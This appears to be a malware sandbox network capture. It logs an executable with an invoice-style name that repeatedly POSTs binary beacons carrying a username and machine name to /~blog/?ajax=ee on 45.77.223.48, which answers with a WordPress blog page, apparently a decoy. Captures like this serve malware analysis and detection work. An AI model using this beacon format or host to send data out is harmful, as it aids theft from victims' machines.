                                              Apr 25, 2024 09:42:44.769484997 CEST134INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46
                                              Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
                                              Apr 25, 2024 09:42:44.769496918 CEST152INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43
                                              Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
                                              Apr 25, 2024 09:42:44.769531012 CEST1289INData Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d
                                              Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
                                              Apr 25, 2024 09:42:44.769593000 CEST1289INData Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72
                                              Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
                                              Apr 25, 2024 09:42:44.769607067 CEST761INData Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74
                                              Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo
                                              Apr 25, 2024 09:42:44.769619942 CEST1289INData Raw: 3c 73 74 79 6c 65 20 69 64 3d 27 77 70 2d 62 6c 6f 63 6b 2d 73 6f 63 69 61 6c 2d 6c 69 6e 6b 73 2d 69 6e 6c 69 6e 65 2d 63 73 73 27 3e 0a 2e 77 70 2d 62 6c 6f 63 6b 2d 73 6f 63 69 61 6c 2d 6c 69 6e 6b 73 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f
                                              Data Ascii: <style id='wp-block-social-links-inline-css'>.wp-block-social-links{background:none;box-sizing:border-box;margin-left:0;padding-left:0;padding-right:0;text-indent:0}.wp-block-social-links .wp-social-link a,.wp-block-social-links .wp-social-li


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              37192.168.2.44978645.77.223.48806536C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe
                                              TimestampBytes transferredDirectionData
                                              Apr 25, 2024 09:42:45.849787951 CEST239OUTPOST /~blog/?ajax=ee HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 45.77.223.48
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: FE983A82
                                              Content-Length: 149
                                              Connection: close
                                              Apr 25, 2024 09:42:45.976818085 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                              Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
                                              Apr 25, 2024 09:42:46.794424057 CEST215INHTTP/1.1 200 OK
                                              Date: Thu, 25 Apr 2024 07:42:45 GMT
                                              Server: Apache
                                              Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/"
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Apr 25, 2024 09:42:46.794595957 CEST59INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22
                                              Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
                                              Apr 25, 2024 09:42:46.794606924 CEST82INData Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a
                                              Data Ascii: UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
                                              Apr 25, 2024 09:42:46.803699970 CEST57INData Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a
                                              Data Ascii: <meta name='robots' content='max-image-preview:large' />
                                              Apr 25, 2024 09:42:46.804141045 CEST32INData Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a
                                              Data Ascii: <title>Natural biz blog</title>
                                              Apr 25, 2024 09:42:46.804174900 CEST134INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46
                                              Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
                                              Apr 25, 2024 09:42:46.804351091 CEST152INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43
                                              Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
                                              Apr 25, 2024 09:42:46.804529905 CEST1289INData Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d
                                              Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
                                              Apr 25, 2024 09:42:46.804586887 CEST1289INData Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72
                                              Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
                                              Apr 25, 2024 09:42:46.805231094 CEST1289INData Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74
                                              Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              38192.168.2.44978745.77.223.48806536C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe
                                              TimestampBytes transferredDirectionData
                                              Apr 25, 2024 09:42:47.218743086 CEST239OUTPOST /~blog/?ajax=ee HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 45.77.223.48
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: FE983A82
                                              Content-Length: 149
                                              Connection: close
                                              Apr 25, 2024 09:42:47.348155022 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                              Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
                                              Apr 25, 2024 09:42:48.176254034 CEST215INHTTP/1.1 200 OK
                                              Date: Thu, 25 Apr 2024 07:42:47 GMT
                                              Server: Apache
                                              Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/"
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Apr 25, 2024 09:42:48.176371098 CEST59INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22
                                              Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
                                              Apr 25, 2024 09:42:48.177015066 CEST82INData Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a
                                              Data Ascii: UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
                                              Apr 25, 2024 09:42:48.185930967 CEST57INData Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a
                                              Data Ascii: <meta name='robots' content='max-image-preview:large' />
                                              Apr 25, 2024 09:42:48.185944080 CEST166INData Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74
                                              Data Ascii: <title>Natural biz blog</title><link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
                                              Apr 25, 2024 09:42:48.186106920 CEST1289INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43
                                              Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0
                                              Apr 25, 2024 09:42:48.186201096 CEST1289INData Raw: 22 2c 22 5c 75 64 38 33 63 5c 75 64 66 66 34 5c 75 32 30 30 62 5c 75 64 62 34 30 5c 75 64 63 36 37 5c 75 32 30 30 62 5c 75 64 62 34 30 5c 75 64 63 36 32 5c 75 32 30 30 62 5c 75 64 62 34 30 5c 75 64 63 36 35 5c 75 32 30 30 62 5c 75 64 62 34 30 5c
                                              Data Ascii: ","\ud83c\udff4\u200b\udb40\udc67\u200b\udb40\udc62\u200b\udb40\udc65\u200b\udb40\udc6e\u200b\udb40\udc67\u200b\udb40\udc7f");case"emoji":return!n(e,"\ud83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undef
                                              Apr 25, 2024 09:42:48.186224937 CEST913INData Raw: 53 74 72 69 6e 67 28 29 5d 2e 6a 6f 69 6e 28 22 2c 22 29 2b 22 29 29 3b 22 2c 72 3d 6e 65 77 20 42 6c 6f 62 28 5b 65 5d 2c 7b 74 79 70 65 3a 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 7d 29 2c 61 3d 6e 65 77 20 57 6f 72 6b 65 72 28 55 52
                                              Data Ascii: String()].join(",")+"));",r=new Blob([e],{type:"text/javascript"}),a=new Worker(URL.createObjectURL(r),{name:"wpTestEmojiSupports"});return void(a.onmessage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(funct
                                              Apr 25, 2024 09:42:48.186350107 CEST1289INData Raw: 3c 73 74 79 6c 65 20 69 64 3d 27 77 70 2d 62 6c 6f 63 6b 2d 73 6f 63 69 61 6c 2d 6c 69 6e 6b 73 2d 69 6e 6c 69 6e 65 2d 63 73 73 27 3e 0a 2e 77 70 2d 62 6c 6f 63 6b 2d 73 6f 63 69 61 6c 2d 6c 69 6e 6b 73 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f
                                              Data Ascii: <style id='wp-block-social-links-inline-css'>.wp-block-social-links{background:none;box-sizing:border-box;margin-left:0;padding-left:0;padding-right:0;text-indent:0}.wp-block-social-links .wp-social-link a,.wp-block-social-links .wp-social-li
                                              Apr 25, 2024 09:42:48.186423063 CEST1289INData Raw: 6c 6f 63 6b 2d 73 6f 63 69 61 6c 2d 6c 69 6e 6b 73 20 2e 77 70 2d 62 6c 6f 63 6b 2d 73 6f 63 69 61 6c 2d 6c 69 6e 6b 2e 77 70 2d 73 6f 63 69 61 6c 2d 6c 69 6e 6b 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 6d 61 72 67 69 6e
                                              Data Ascii: lock-social-links .wp-block-social-link.wp-social-link{display:inline-block;margin:0;padding:0}.wp-block-social-links .wp-block-social-link.wp-social-link .wp-block-social-link-anchor,.wp-block-social-links .wp-block-social-link.wp-social-link


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              39192.168.2.44978845.77.223.48806536C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe
                                              TimestampBytes transferredDirectionData
                                              Apr 25, 2024 09:42:48.461123943 CEST239OUTPOST /~blog/?ajax=ee HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 45.77.223.48
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: FE983A82
                                              Content-Length: 149
                                              Connection: close
                                              Apr 25, 2024 09:42:48.592617989 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                              Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
                                              Apr 25, 2024 09:42:49.394450903 CEST215INHTTP/1.1 200 OK
                                              Date: Thu, 25 Apr 2024 07:42:48 GMT
                                              Server: Apache
                                              Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/"
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Apr 25, 2024 09:42:49.394601107 CEST59INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22
                                              Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
                                              Apr 25, 2024 09:42:49.394612074 CEST82INData Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a
                                              Data Ascii: UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
                                              Apr 25, 2024 09:42:49.402648926 CEST57INData Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a
                                              Data Ascii: <meta name='robots' content='max-image-preview:large' />
                                              Apr 25, 2024 09:42:49.403395891 CEST32INData Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a
                                              Data Ascii: <title>Natural biz blog</title>
                                              Apr 25, 2024 09:42:49.403462887 CEST134INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46
                                              Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
                                              Apr 25, 2024 09:42:49.403629065 CEST1289INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43
                                              Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0
                                              Apr 25, 2024 09:42:49.403682947 CEST1289INData Raw: 22 2c 22 5c 75 64 38 33 63 5c 75 64 66 66 34 5c 75 32 30 30 62 5c 75 64 62 34 30 5c 75 64 63 36 37 5c 75 32 30 30 62 5c 75 64 62 34 30 5c 75 64 63 36 32 5c 75 32 30 30 62 5c 75 64 62 34 30 5c 75 64 63 36 35 5c 75 32 30 30 62 5c 75 64 62 34 30 5c
                                              Data Ascii: ","\ud83c\udff4\u200b\udb40\udc67\u200b\udb40\udc62\u200b\udb40\udc65\u200b\udb40\udc6e\u200b\udb40\udc67\u200b\udb40\udc7f");case"emoji":return!n(e,"\ud83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undef
                                              Apr 25, 2024 09:42:49.403737068 CEST1289INData Raw: 53 74 72 69 6e 67 28 29 5d 2e 6a 6f 69 6e 28 22 2c 22 29 2b 22 29 29 3b 22 2c 72 3d 6e 65 77 20 42 6c 6f 62 28 5b 65 5d 2c 7b 74 79 70 65 3a 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 7d 29 2c 61 3d 6e 65 77 20 57 6f 72 6b 65 72 28 55 52
                                              Data Ascii: String()].join(",")+"));",r=new Blob([e],{type:"text/javascript"}),a=new Worker(URL.createObjectURL(r),{name:"wpTestEmojiSupports"});return void(a.onmessage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(funct
                                              Apr 25, 2024 09:42:49.403791904 CEST1289INData Raw: 61 6c 2d 6c 69 6e 6b 73 20 2e 77 70 2d 73 6f 63 69 61 6c 2d 6c 69 6e 6b 20 73 76 67 7b 68 65 69 67 68 74 3a 31 65 6d 3b 77 69 64 74 68 3a 31 65 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 6f 63 69 61 6c 2d 6c 69 6e 6b 73 20 2e 77 70 2d 73 6f 63 69 61
                                              Data Ascii: al-links .wp-social-link svg{height:1em;width:1em}.wp-block-social-links .wp-social-link span:not(.screen-reader-text){font-size:.65em;margin-left:.5em;margin-right:.5em}.wp-block-social-links.has-small-icon-size{font-size:16px}.wp-block-socia


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              40192.168.2.44978945.77.223.48806536C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe
                                              TimestampBytes transferredDirectionData
                                              Apr 25, 2024 09:42:49.681958914 CEST239OUTPOST /~blog/?ajax=ee HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 45.77.223.48
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: FE983A82
                                              Content-Length: 149
                                              Connection: close
                                              Apr 25, 2024 09:42:49.811392069 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                              Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
                                              Apr 25, 2024 09:42:50.652350903 CEST215INHTTP/1.1 200 OK
                                              Date: Thu, 25 Apr 2024 07:42:49 GMT
                                              Server: Apache
                                              Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/"
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Apr 25, 2024 09:42:50.652472973 CEST59INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22
                                              Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
                                              Apr 25, 2024 09:42:50.652546883 CEST82INData Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a
                                              Data Ascii: UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
                                              Apr 25, 2024 09:42:50.661850929 CEST57INData Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a
                                              Data Ascii: <meta name='robots' content='max-image-preview:large' />
                                              Apr 25, 2024 09:42:50.662633896 CEST32INData Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a
                                              Data Ascii: <title>Natural biz blog</title>
                                              Apr 25, 2024 09:42:50.662764072 CEST134INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46
                                              Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
                                              Apr 25, 2024 09:42:50.662924051 CEST1289INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43
                                              Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0
                                              Apr 25, 2024 09:42:50.662957907 CEST1289INData Raw: 22 2c 22 5c 75 64 38 33 63 5c 75 64 66 66 34 5c 75 32 30 30 62 5c 75 64 62 34 30 5c 75 64 63 36 37 5c 75 32 30 30 62 5c 75 64 62 34 30 5c 75 64 63 36 32 5c 75 32 30 30 62 5c 75 64 62 34 30 5c 75 64 63 36 35 5c 75 32 30 30 62 5c 75 64 62 34 30 5c
                                              Data Ascii: ","\ud83c\udff4\u200b\udb40\udc67\u200b\udb40\udc62\u200b\udb40\udc65\u200b\udb40\udc6e\u200b\udb40\udc67\u200b\udb40\udc7f");case"emoji":return!n(e,"\ud83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undef
                                              Apr 25, 2024 09:42:50.663157940 CEST1289INData Raw: 53 74 72 69 6e 67 28 29 5d 2e 6a 6f 69 6e 28 22 2c 22 29 2b 22 29 29 3b 22 2c 72 3d 6e 65 77 20 42 6c 6f 62 28 5b 65 5d 2c 7b 74 79 70 65 3a 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 7d 29 2c 61 3d 6e 65 77 20 57 6f 72 6b 65 72 28 55 52
